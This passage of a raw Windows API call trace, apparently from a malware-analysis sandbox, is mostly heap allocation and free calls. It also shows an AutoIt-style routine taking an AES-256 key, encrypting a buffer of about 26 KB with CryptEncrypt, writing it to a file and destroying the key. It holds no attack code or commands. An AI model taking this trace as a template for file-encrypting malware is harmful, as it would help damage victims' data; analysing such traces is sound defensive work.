Size=0x4) returned 0x43e2aa0 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0117.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0117.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0117.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0117.372] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0440 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0117.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03f0 | out: hHeap=0x1780000) returned 1 [0117.372] CryptGetKeyParam (in: hKey=0x41ac780, dwParam=0x7, pbData=0x43e2980, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2980*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03c8 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0117.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0117.374] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.374] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8f00 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e18 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.375] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0117.375] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0328 | out: hHeap=0x1780000) returned 1 [0117.375] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea6b8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0468 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d02b0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0350 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04b8 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d03a0 | out: hHeap=0x1780000) returned 1 [0117.376] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0508 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0418 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0117.377] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.377] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0117.377] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.377] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.377] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0117.378] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0117.378] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0117.378] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0117.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0117.378] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cafe8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.379] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x65cf, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x65d0) returned 1 [0117.379] CharLowerBuffW (in: lpsz="byte[26065]", cchLength=0xb | out: lpsz="byte[26065]") returned 0xb [0117.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0117.380] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb270, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0117.380] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4529198*, pdwDataLen=0x144e088*=0x65cf, dwBufLen=0x65d0 | out: pbData=0x4529198*, pdwDataLen=0x144e088*=0x65d0) returned 1 [0117.380] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0117.380] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0117.381] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x65d0, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ea8c*=0x65d0, lpOverlapped=0x0) returned 1 [0117.382] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0117.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0117.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0117.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0117.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cac70, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0117.383] CryptDestroyKey (hKey=0x41ac780) returned 1 [0117.383] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0117.383] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 